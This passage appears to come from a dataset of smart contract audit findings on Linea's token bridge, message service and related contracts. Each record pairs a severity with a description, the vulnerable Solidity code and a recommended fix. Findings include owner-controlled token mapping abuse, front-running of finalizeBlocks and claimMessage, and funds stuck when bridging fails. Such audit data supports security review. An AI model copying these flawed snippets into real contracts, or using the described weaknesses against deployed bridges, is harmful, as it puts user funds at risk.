require(remainder > 0, '!Remainder');\\n address holder = ownerOf(planId);\\n delete plans[planId];\\n \\_burn(planId);\\n TransferHelper.withdrawTokens(plan.token, vestingAdmin, remainder);\\n TransferHelper.withdrawTokens(plan.token, holder, balance);\\n emit PlanRevoked(planId, balance, remainder);\\n}\\n```\\n -Use of selfdestruct Deprecated in VotingVaultчlowчThe `VotingVault.withdrawTokens` function invokes the `selfdestruct` operation when the vault is empty so that it can't be used again.\\nThe use ofselfdestruct has been deprecated and a breaking change in its future behavior is expected.\\n```\\nfunction withdrawTokens(address to, uint256 amount) external onlyController {\\n TransferHelper.withdrawTokens(token, to, amount);\\n if (IERC20(token).balanceOf(address(this)) == 0) selfdestruct;\\n}\\n```\\nчRemove the line that invokes `selfdestruct` and consider changing internal state so that 
future calls to `delegateTokens` always revert.чч```\\nfunction withdrawTokens(address to, uint256 amount) external onlyController {\\n TransferHelper.withdrawTokens(token, to, amount);\\n if (IERC20(token).balanceOf(address(this)) == 0) selfdestruct;\\n}\\n```\\n -Balance of msg.sender Is Used Instead of the from AddressчlowчThe `TransferHelper` library has methods that allow transferring tokens directly or on behalf of a different wallet that previously approved the transfer. Those functions also check the sender balance before conducting the transfer. In the second case, where the transfer happens on behalf of someone the code is checking not the actual token spender balance, but the `msg.sender` balance instead.\\n```\\nfunction transferTokens(\\n address token,\\n address from,\\n address to,\\n uint256 amount\\n) internal {\\n uint256 priorBalance = IERC20(token).balanceOf(address(to));\\n require(IERC20(token).balanceOf(msg.sender) >= amount, 'THL01');\\n```\\nчUse the `from` parameter instead of `msg.sender`.чч```\\nfunction transferTokens(\\n address token,\\n address from,\\n address to,\\n uint256 amount\\n) internal {\\n uint256 priorBalance = IERC20(token).balanceOf(address(to));\\n require(IERC20(token).balanceOf(msg.sender) >= amount, 'THL01');\\n```\\n -Bridge Token Would Be Locked and Cannot Bridge to Native TokenчhighчIf the bridge token B of a native token A is already deployed and `confirmDeployment` is called on the other layer and `setDeployed` sets A's `nativeToBridgedToken` value to `DEPLOYED_STATUS`. The bridge token B cannot bridge to native token A in `completeBridging` function, because A's `nativeToBridgedToken` value is not `NATIVE_STATUS`, as a result the native token won't be transferred to the receiver. 
User's bridge token will be locked in the original layer\\n```\\nif (nativeMappingValue == NATIVE\\_STATUS) {\\n // Token is native on the local chain\\n IERC20(\\_nativeToken).safeTransfer(\\_recipient, \\_amount);\\n} else {\\n bridgedToken = nativeMappingValue;\\n if (nativeMappingValue == EMPTY) {\\n // New token\\n bridgedToken = deployBridgedToken(\\_nativeToken, \\_tokenMetadata);\\n bridgedToNativeToken[bridgedToken] = \\_nativeToken;\\n nativeToBridgedToken[\\_nativeToken] = bridgedToken;\\n }\\n BridgedToken(bridgedToken).mint(\\_recipient, \\_amount);\\n}\\n```\\n\\n```\\nfunction setDeployed(address[] memory \\_nativeTokens) external onlyMessagingService fromRemoteTokenBridge {\\n address nativeToken;\\n for (uint256 i; i < \\_nativeTokens.length; i++) {\\n nativeToken = \\_nativeTokens[i];\\n nativeToBridgedToken[\\_nativeTokens[i]] = DEPLOYED\\_STATUS;\\n emit TokenDeployed(\\_nativeTokens[i]);\\n }\\n}\\n```\\nчAdd an condition `nativeMappingValue` = `DEPLOYED_STATUS` for native token transfer in `confirmDeployment`\\n```\\nif (nativeMappingValue == NATIVE_STATUS || nativeMappingValue == DEPLOYED_STATUS) {\\n IERC20(_nativeToken).safeTransfer(_recipient, _amount);\\n```\\nчч```\\nif (nativeMappingValue == NATIVE\\_STATUS) {\\n // Token is native on the local chain\\n IERC20(\\_nativeToken).safeTransfer(\\_recipient, \\_amount);\\n} else {\\n bridgedToken = nativeMappingValue;\\n if (nativeMappingValue == EMPTY) {\\n // New token\\n bridgedToken = deployBridgedToken(\\_nativeToken, \\_tokenMetadata);\\n bridgedToNativeToken[bridgedToken] = \\_nativeToken;\\n nativeToBridgedToken[\\_nativeToken] = bridgedToken;\\n }\\n BridgedToken(bridgedToken).mint(\\_recipient, \\_amount);\\n}\\n```\\n -User Cannot Withdraw Funds if Bridging Failed or Delayed Won't FixчhighчIf the bridging failed due to the single coordinator is down, censoring the message, or bridge token contract is set to a bad or wrong contract address by `setCustomContract`, user's funds will 
stuck in the `TokenBridge` contract until coordinator is online or stop censoring, there is no way to withdraw the deposited funds\\n```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\nчAdd withdraw functionality to let user withdraw the funds under above circumstances or at least add withdraw functionality for Admin (admin can send the funds to the user manually), ultimately decentralize coordinator and sequencer to reduce bridging failure risk.чч```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n -Bridges Don't Support Multiple Native Tokens, Which May Lead to Incorrect BridgingчhighчCurrently, the system design does not support the scenarios where native tokens with the same addresses (which is possible with the same deployer and nonce) on different layers can be bridged.\\nFor instance, Let's consider, there is a native token `A` on `L1` which has already been bridged on `L2`. 
If anyone tries to bridge native token `B` on `L2` with the same address as token `A` , instead of creating a new bridge on `L1` and minting new tokens, the token bridge will transfer native token `A` on `L1` to the `_recipient` which is incorrect.\\nThe reason is the mappings don't differentiate between the native tokens on two different Layers.\\n```\\n mapping(address => address) public nativeToBridgedToken;\\n mapping(address => address) public bridgedToNativeToken;\\n```\\n\\n```\\nfunction completeBridging(\\n address \\_nativeToken,\\n uint256 \\_amount,\\n address \\_recipient,\\n bytes calldata \\_tokenMetadata\\n) external onlyMessagingService fromRemoteTokenBridge {\\n address nativeMappingValue = nativeToBridgedToken[\\_nativeToken];\\n address bridgedToken;\\n\\n if (nativeMappingValue == NATIVE\\_STATUS) {\\n // Token is native on the local chain\\n IERC20(\\_nativeToken).safeTransfer(\\_recipient, \\_amount);\\n } else {\\n```\\nчRedesign the approach to handle the same native tokens on different layers. One possible approach could be to define the set of mappings for each layer.чч```\\n mapping(address => address) public nativeToBridgedToken;\\n mapping(address => address) public bridgedToNativeToken;\\n```\\n -No Check for Initializing Parameters of TokenBridgeчhighчIn `TokenBridge` contract's `initialize` function, there is no check for initializing parameters including `_securityCouncil`, `_messageService`, `_tokenBeacon` and `_reservedTokens`. 
If any of these address is set to 0 or other invalid value, `TokenBridge` would not work, user may lose funds.\\n```\\nfunction initialize(\\n address \\_securityCouncil,\\n address \\_messageService,\\n address \\_tokenBeacon,\\n address[] calldata \\_reservedTokens\\n) external initializer {\\n \\_\\_Pausable\\_init();\\n \\_\\_Ownable\\_init();\\n setMessageService(\\_messageService);\\n tokenBeacon = \\_tokenBeacon;\\n for (uint256 i = 0; i < \\_reservedTokens.length; i++) {\\n setReserved(\\_reservedTokens[i]);\\n }\\n \\_transferOwnership(\\_securityCouncil);\\n}\\n```\\nчAdd non-zero address check for `_securityCouncil`, `_messageService`, `_tokenBeacon` and `_reservedTokens`чч```\\nfunction initialize(\\n address \\_securityCouncil,\\n address \\_messageService,\\n address \\_tokenBeacon,\\n address[] calldata \\_reservedTokens\\n) external initializer {\\n \\_\\_Pausable\\_init();\\n \\_\\_Ownable\\_init();\\n setMessageService(\\_messageService);\\n tokenBeacon = \\_tokenBeacon;\\n for (uint256 i = 0; i < \\_reservedTokens.length; i++) {\\n setReserved(\\_reservedTokens[i]);\\n }\\n \\_transferOwnership(\\_securityCouncil);\\n}\\n```\\n -Owner Can Update Arbitrary Status for New Native Token Without ConfirmationчhighчThe function `setCustomContract` allows the owner to update arbitrary status for new native tokens without confirmation, bypassing the bridge protocol.\\nIt can set `DEPLOYED_STATUS` for a new native token, even if there exists no bridged token for it.\\nIt can set `NATIVE_STATUS` for a new native token even if it's not.\\nIt can set `RESERVED_STATUS` disallowing any new native token to be bridged.\\n```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\nчThe 
function should not allow `_targetContract` to be any state codeчч```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n -Owner May Exploit Bridged TokensчhighчThe function `setCustomContract` allows the owner, to define a custom ERC20 contract for the native token. However, it doesn't check whether the target contract has already been defined as a bridge to a native token or not. As a result, the owner may take advantage of the design flaw and bridge another new native token that has not been bridged yet, to an already existing target(already a bridge for another native token). Now, if a user tries to bridge this native token, the token bridge on the source chain will take the user's tokens, and instead of deploying a new bridge on the destination chain, tokens will be minted to the `_recipient` on an existing bridge defined by the owner, or it can be any random EOA address to create a DoS.\\nThe owner can also try to front-run calls to `completeBridging` for new Native Tokens on the destination chain, by setting a different bridge via `setCustomContract`. 
Although, the team states that the role will be controlled by a multi-sig which makes frontrunning less likely to happen.\\n```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n\\n```\\n} else {\\n bridgedToken = nativeMappingValue;\\n if (nativeMappingValue == EMPTY) {\\n // New token\\n bridgedToken = deployBridgedToken(\\_nativeToken, \\_tokenMetadata);\\n bridgedToNativeToken[bridgedToken] = \\_nativeToken;\\n nativeToBridgedToken[\\_nativeToken] = bridgedToken;\\n }\\n BridgedToken(bridgedToken).mint(\\_recipient, \\_amount);\\n}\\n```\\nчMake sure, a native token should bridge to a single target contract. A possible approach could be to check whether the `bridgedToNativeToken` for a target is `EMPTY` or not. If it's not `EMPTY`, it means it's already a bridge for a native token and the function should revert. The same can be achieved by adding the modifier `isNewToken(_targetContract)`.\\nNote:- However, it doesn't resolve the issue of frontrunning, even if the likelihood is less.чч```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n -Updating Message Service Does Not Emit EventчmediumчResolution\\nThe recommendations are implemented by the Linea team in the pull request 69 with the final commit hash as `1fdd5cfc51c421ad9aaf8b2fd2b3e2ed86ffa898`\\nThe function `setMessageService` allows the owner to update the message service address. However, it does not emit any event reflecting the change. 
As a result, in case the owner gets compromised, it can silently add a malicious message service, exploiting users' funds. Since, there was no event emitted, off-chain monitoring tools wouldn't be able to trigger alarms and users would continue using rogue message service until and unless tracked manually.\\n```\\nfunction setMessageService(address \\_messageService) public onlyOwner {\\n messageService = IMessageService(\\_messageService);\\n}\\n```\\nчConsider emitting an event reflecting the update from the old message service to the new one.чч```\\nfunction setMessageService(address \\_messageService) public onlyOwner {\\n messageService = IMessageService(\\_messageService);\\n}\\n```\\n -Lock Solidity Version in pragmaчlowчContracts should be deployed with the same compiler version they have been tested with. Locking the pragma helps ensure that contracts do not accidentally get deployed using, for example, the latest compiler which may have higher risks of undiscovered bugs. Contracts may also be deployed by others and the pragma indicates the compiler version intended by the original authors.\\nSee Locking Pragmas in Ethereum Smart Contract Best Practices.\\n```\\npragma solidity ^0.8.19;\\n```\\n\\n```\\npragma solidity ^0.8.19;\\n```\\n\\n```\\npragma solidity ^0.8.19;\\n```\\n\\n```\\npragma solidity ^0.8.19;\\n```\\nчLock the Solidity version to the latest version before deploying the contracts to production.\\n```\\npragma solidity 0.8.19;\\n```\\nчч```\\npragma solidity ^0.8.19;\\n```\\n -TokenBridge Does Not Follow a 2-Step Approach for Ownership TransfersчlowчResolution\\nThe recommendations are implemented by the Linea team in the pull request 71 with the final commit hash as `8ebfd011675ea318b7067af52637192aa1126acd`\\n`TokenBridge` defines a privileged role Owner, however, it uses a single-step approach, which immediately transfers the ownership to the new address. 
If accidentally passed an incorrect address, the current owner will immediately lose control over the system as there is no fail-safe mechanism.\\nA safer approach would be to first propose the ownership to the new owner, and let the new owner accept the proposal to be the new owner. It will add a fail-safe mechanism for the current owner as in case it proposes ownership to an incorrect address, it will not immediately lose control, and may still propose again to a correct address.\\n```\\ncontract TokenBridge is ITokenBridge, PausableUpgradeable, OwnableUpgradeable {\\n```\\nчConsider moving to a 2-step approach for the ownership transfers as recommended above. Note:- Openzeppelin provides another helper utility as Ownable2StepUpgradeable which follows the recommended approachчч```\\ncontract TokenBridge is ITokenBridge, PausableUpgradeable, OwnableUpgradeable {\\n```\\n -Heavy Blocks May Affect Block Finalization, if the Gas Requirement Exceeds Block Gas LimitчhighчThe `sequencer` takes care of finalizing blocks by submitting proof, blocks' data, proof type, and parent state root hash. The team mentions that the blocks are finalized every 12s, and under general scenarios, the system will work fine. However, in cases where there are blocks containing lots of transactions and event logs, the function may require gas more than the block gas limit. 
As a consequence, it may affect block finalization or lead to a potential DoS.\\n```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n```\\nчWe advise the team to benchmark the cost associated per block for the finalization and how many blocks can be finalized in one rollup and add the limits accordingly for the prover/sequencer.чч```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n```\\n -Postman Can Incorrectly Deliver a Message While Still Collecting the FeesчhighчThe message service allows cross chain message delivery, where the user can define the parameters of the message as:\\nfrom: Sender of the message _to: Receiver of the message _fee: The fees, the sender wants to pay to the postman to deliver the message valueSent: The value in the native currency of the chain to be sent with the message messageNumber: Nonce value which increments for every message _calldata: Calldata for the message to be executed on the destination chain\\nThe postman estimates the gas before claiming/delivering the message on the destination chain, thus avoiding scenarios where the fees sent are less than the cost of claiming the message.\\nHowever, there is nothing that restricts the postman from sending the gas equal to the fees paid by the user. Although it contributes to the MEV, where the postman can select the messages with higher fees first and deliver them prior to others, it also opens up an opportunity where the postman can deliver a message incorrectly while still claiming the fees.\\nOne such scenario is, where the low-level call to target `_to` makes another sub-call to another address, let's say `x`. Let's assume, the `_to` address doesn't check, whether the call to address `x` was successful or not. 
Now, if the postman supplies a gas, which makes the top-level call succeed, but the low-level call to `x` fails silently, the postman will still be retrieving the fees of claiming the message, even though the message was not correctly delivered.\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\nчAnother parameter can be added to the message construct giving the user the option to define the amount of gas required to complete a transaction entirely. Also, a check can be added while claiming the message, to make sure the gas supplied by the postman is sufficient enough compared to the gas defined/demanded by the user. The cases, where the user can demand a huge amount of gas, can be simply avoided by doing the gas estimation, and if the demanded gas is more than the supplied fees, the postman will simply opt not to deliver the messageчч```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n -User's Funds Would Stuck if the Message Claim Failed on the Destination LayerчhighчWhen claiming the message on the destination layer, if the message failed to execute with various reasons (e.g. 
wrong target contract address, wrong contract logic, out of gas, malicious contract), the Ether sent with `sendMessage` on the original layer will be stuck, although the message can be retried later by the Postman or the user (could fail again)\\n```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, \\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\nчAdd refund mechanism to refund users funds if the message failed to deliver on the destination layerчч```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, \\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n -Front Running finalizeBlocks When Sequencers Are DecentralizedчhighчWhen sequencer is decentralized in the future, one sequencer could front run another sequencer's `finalizeBlocks` transaction, without doing the actual proving and sequencing, and steal the reward for sequencing if there is one. 
Once the frontrunner's `finalizeBlocks` is executed, the original sequencer's transaction would fail as `currentL2BlockNumber` would increment by one and state root hash won't match, as a result the original sequencer's sequencing and proving work will be wasted.\\n```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n if (stateRootHashes[currentL2BlockNumber] != \\_parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n }\\n\\n \\_finalizeBlocks(\\_blocksData, \\_proof, \\_proofType, \\_parentStateRootHash, true);\\n}\\n```\\nчAdd the sequencer's address as one parameters in `_finalizeBlocks` function, and include the sequencer's address in the public input hash of the proof in verification function `_verifyProof`.\\n```\\nfunction _finalizeBlocks(\\n BlockData[] calldata _blocksData,\\n bytes memory _proof,\\n uint256 _proofType,\\n bytes32 _parentStateRootHash,\\n bool _shouldProve,\\n address _sequencer\\n )\\n```\\n\\n```\\n_verifyProof(\\n uint256(\\n keccak256(\\n abi.encode(\\n keccak256(abi.encodePacked(blockHashes)),\\n firstBlockNumber,\\n keccak256(abi.encodePacked(timestampHashes)),\\n keccak256(abi.encodePacked(hashOfRootHashes)),\\n keccak256(abi.encodePacked(_sequencer)\\n )\\n )\\n ) % MODULO_R,\\n _proofType,\\n _proof,\\n _parentStateRootHash\\n );\\n```\\nчч```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n if (stateRootHashes[currentL2BlockNumber] != \\_parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n }\\n\\n 
\\_finalizeBlocks(\\_blocksData, \\_proof, \\_proofType, \\_parentStateRootHash, true);\\n}\\n```\\n -User Funds Would Stuck if the Single Coordinator Is Offline or Censoring MessagesчhighчWhen user sends message from L1 to L2, the coordinator needs to post the messages to L2, this happens in the anchoring message(addL1L2MessageHashes) on L2, then the user or Postman can claim the message on L2. since there is only a single coordinator, if the coordinator is down or censoring messages sent from L1 to L2, users funds can stuck in L1, until the coordinator come back online or stops censoring the message, as there is no message cancel feature or message expire feature. Although the operator can pause message sending on L1 once the coordinator is down, but if the message is sent and not posted to L2 before the pause it will still stuck.\\n```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, \\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n\\n```\\nfunction addL1L2MessageHashes(bytes32[] calldata \\_messageHashes) external onlyRole(L1\\_L2\\_MESSAGE\\_SETTER\\_ROLE) {\\n uint256 messageHashesLength = \\_messageHashes.length;\\n\\n if (messageHashesLength > 100) {\\n revert MessageHashesListLengthHigherThanOneHundred(messageHashesLength);\\n }\\n\\n for (uint256 i; i < messageHashesLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n if (inboxL1L2MessageStatus[messageHash] == INBOX\\_STATUS\\_UNKNOWN) {\\n inboxL1L2MessageStatus[messageHash] = INBOX\\_STATUS\\_RECEIVED;\\n }\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessageHashesAddedToInbox(\\_messageHashes);\\n}\\n```\\nчDecentralize coordinator and sequencer or enable user cancel or drop the message if message deadline has expired.чч```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, 
\\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n -Changing Verifier Address Doesn't Emit EventчhighчIn function `setVerifierAddress`, after the verifier address is changed, there is no event emitted, which means if the operator (security council) changes the verifier to a buggy verifier, or if the security council is compromised, the attacker can change the verifier to a malicious one, the unsuspecting user would still use the service, potentially lose funds due to the fraud transactions would be verified.\\n```\\nfunction setVerifierAddress(address \\_newVerifierAddress, uint256 \\_proofType) external onlyRole(DEFAULT\\_ADMIN\\_ROLE) {\\n if (\\_newVerifierAddress == address(0)) {\\n revert ZeroAddressNotAllowed();\\n }\\n verifiers[\\_proofType] = \\_newVerifierAddress;\\n}\\n```\\nчEmits event after changing verifier address including old verifier address, new verifier address and the caller accountчч```\\nfunction setVerifierAddress(address \\_newVerifierAddress, uint256 \\_proofType) external onlyRole(DEFAULT\\_ADMIN\\_ROLE) {\\n if (\\_newVerifierAddress == address(0)) {\\n revert ZeroAddressNotAllowed();\\n }\\n verifiers[\\_proofType] = \\_newVerifierAddress;\\n}\\n```\\n -L2 Blocks With Incorrect Timestamp Could Be FinalizedчmediumчIn `_finalizeBlocks` of `ZkEvmV2`, the current block timestamp `blockInfo.l2BlockTimestamp` should be greater or equal than the last L2 block timestamp and less or equal than the L1 block timestamp when `_finalizeBlocks` is executed. 
However the first check is missing, blocks with incorrect timestamp could be finalized, causing unintended system behavior\\n```\\nif (blockInfo.l2BlockTimestamp >= block.timestamp) {\\n revert BlockTimestampError();\\n}\\n```\\nчAdd the missing timestamp checkчч```\\nif (blockInfo.l2BlockTimestamp >= block.timestamp) {\\n revert BlockTimestampError();\\n}\\n```\\n -Rate Limiting Affecting the Usability and User's Funds SafetyчmediumчIn `claimMessage` of `L1MessageService` and `sendMessage` function of `L1MessageService` contract, function `_addUsedAmount` is used to rate limit the Ether amount (1000 Eth) sent from L2 to L1 in a time period (24 hours), this is problematic, usually user sends the funds to L1 when they need to exit from L2 to L1 especially when some security issues happened affecting their funds safety on L2, if there is a limit, the limit can be reached quickly by some whale sending large amount of Ether to L1, while other users cannot withdraw their funds to L1, putting their funds at risk. 
In addition, the limit can only be set and changed by the security council and security council can also pause message service at any time, blocking user withdraw funds from L2, this makes the L2->L1 message service more centralized.\\n```\\n\\_addUsedAmount(\\_fee + \\_value);\\n```\\n\\n```\\n\\_addUsedAmount(msg.value);\\n```\\n\\n```\\nfunction \\_addUsedAmount(uint256 \\_usedAmount) internal {\\n uint256 currentPeriodAmountTemp;\\n\\n if (currentPeriodEnd < block.timestamp) {\\n // Update period before proceeding\\n currentPeriodEnd = block.timestamp + periodInSeconds;\\n currentPeriodAmountTemp = \\_usedAmount;\\n } else {\\n currentPeriodAmountTemp = currentPeriodAmountInWei + \\_usedAmount;\\n }\\n\\n if (currentPeriodAmountTemp > limitInWei) {\\n revert RateLimitExceeded();\\n }\\n\\n currentPeriodAmountInWei = currentPeriodAmountTemp;\\n}\\n```\\nчRemove rate limiting for L2->L1 message serviceчч```\\n\\_addUsedAmount(\\_fee + \\_value);\\n```\\n -Front Running claimMessage on L1 and L2чmediumчThe front-runner on L1 or L2 can front run the `claimMessage` transaction, as long as the `fee` is greater than the gas cost of the claiming the message and `feeRecipient` is not set, consequently the `fee` will be transferred to the message.sender(the front runner) once the message is claimed. As a result, postman would lose the incentive to deliver(claim) the message on the destination layer.\\n```\\nif (\\_fee > 0) {\\n address feeReceiver = \\_feeRecipient == address(0) ? msg.sender : \\_feeRecipient;\\n (bool feePaymentSuccess, ) = feeReceiver.call{ value: \\_fee }(\"\");\\n if (!feePaymentSuccess) {\\n revert FeePaymentFailed(feeReceiver);\\n }\\n```\\n\\n```\\nif (\\_fee > 0) {\\n address feeReceiver = \\_feeRecipient == address(0) ? 
msg.sender : \\_feeRecipient;\\n (bool feePaymentSuccess, ) = feeReceiver.call{ value: \\_fee }(\"\");\\n if (!feePaymentSuccess) {\\n revert FeePaymentFailed(feeReceiver);\\n }\\n}\\n```\\nчThere are a few protections against front running including flashbots service. Another option to mitigate front running is to avoid using msg.sender and have user use the signed `claimMessage` transaction by the Postman to claim the message on the destination layerчч```\\nif (\\_fee > 0) {\\n address feeReceiver = \\_feeRecipient == address(0) ? msg.sender : \\_feeRecipient;\\n (bool feePaymentSuccess, ) = feeReceiver.call{ value: \\_fee }(\"\");\\n if (!feePaymentSuccess) {\\n revert FeePaymentFailed(feeReceiver);\\n }\\n```\\n -Contracts Not Well Designed for UpgradesчmediumчInconsistent Storage Layout\\nThe Contracts introduce some buffer space in the storage layout to cope with the scenarios where new storage variables can be added if a need exists to upgrade the contracts to a newer version. This helps in reducing the chances of potential storage collisions. However, the storage layout concerning the buffer space is inconsistent, and multiple variations have been observed.\\n`PauseManager`, `RateLimitter`, and `MessageServiceBase` adds a buffer space of 10, contrary to other contracts which define the space as 50.\\n```\\nuint256[10] private \\_gap;\\n```\\n\\n```\\nuint256[10] private \\_gap;\\n```\\n\\n```\\nuint256[10] private \\_\\_base\\_gap;\\n```\\n\\n`L2MessageService` defines the buffer space prior to its existing storage variables.\\n```\\nuint256[50] private \\_\\_gap\\_L2MessageService;\\n```\\n\\nIf there exists a need to inherit from this contract in the future, the derived contract has to define the buffer space first, similar to `L2MessageService`. If it doesn't, `L2MessageService` can't have more storage variables. If it adds them, it will collide with the derived contract's storage slots.\\n2. 
`RateLimiter` and `MessageServiceBase` initializes values without the modifier `onlyInitializing`\\n```\\nfunction \\_\\_RateLimiter\\_init(uint256 \\_periodInSeconds, uint256 \\_limitInWei) internal {\\n```\\n\\n```\\nfunction \\_init\\_MessageServiceBase(address \\_messageService, address \\_remoteSender) internal {\\n```\\n\\nThe modifier `onlyInitializing` makes sure that the function should only be invoked by a function marked as `initializer`. However, it is absent here, which means these are normal internal functions that can be utilized in any other function, thus opening opportunities for errors.чDefine a consistent storage layout. Consider a positive number `n` for the number of buffer space slots, such that, it is equal to any arbitrary number `d - No. of occupied storage slots`. For instance, if the arbitrary number is 50, and the contract has 20 occupied storage slots, the buffer space can be 50-20 = 30. It will maintain a consistent storage layout throughout the inheritance hierarchy.\\nFollow a consistent approach to defining buffer space. 
Currently, all the contracts, define the buffer space after their occupied storage slots, so it should be maintained in the `L2MessageService` as well.\\nDefine functions `__RateLimiter_init` and `_init_MessageServiceBase` as `onlyInitializing`.чч```\\nuint256[10] private \\_gap;\\n```\\n -Potential Code CorrectionsчlowчFunction `_updateL1L2MessageStatusToReceived` and `addL1L2MessageHashes` allows status update for already received/sent/claimed messages.\\n```\\nfunction \\_updateL1L2MessageStatusToReceived(bytes32[] memory \\_messageHashes) internal {\\n uint256 messageHashArrayLength = \\_messageHashes.length;\\n\\n for (uint256 i; i < messageHashArrayLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n uint256 existingStatus = outboxL1L2MessageStatus[messageHash];\\n\\n if (existingStatus == INBOX\\_STATUS\\_UNKNOWN) {\\n revert L1L2MessageNotSent(messageHash);\\n }\\n\\n if (existingStatus != OUTBOX\\_STATUS\\_RECEIVED) {\\n outboxL1L2MessageStatus[messageHash] = OUTBOX\\_STATUS\\_RECEIVED;\\n }\\n\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessagesReceivedOnL2(\\_messageHashes);\\n}\\n```\\n\\n```\\nfunction addL1L2MessageHashes(bytes32[] calldata \\_messageHashes) external onlyRole(L1\\_L2\\_MESSAGE\\_SETTER\\_ROLE) {\\n uint256 messageHashesLength = \\_messageHashes.length;\\n\\n if (messageHashesLength > 100) {\\n revert MessageHashesListLengthHigherThanOneHundred(messageHashesLength);\\n }\\n\\n for (uint256 i; i < messageHashesLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n if (inboxL1L2MessageStatus[messageHash] == INBOX\\_STATUS\\_UNKNOWN) 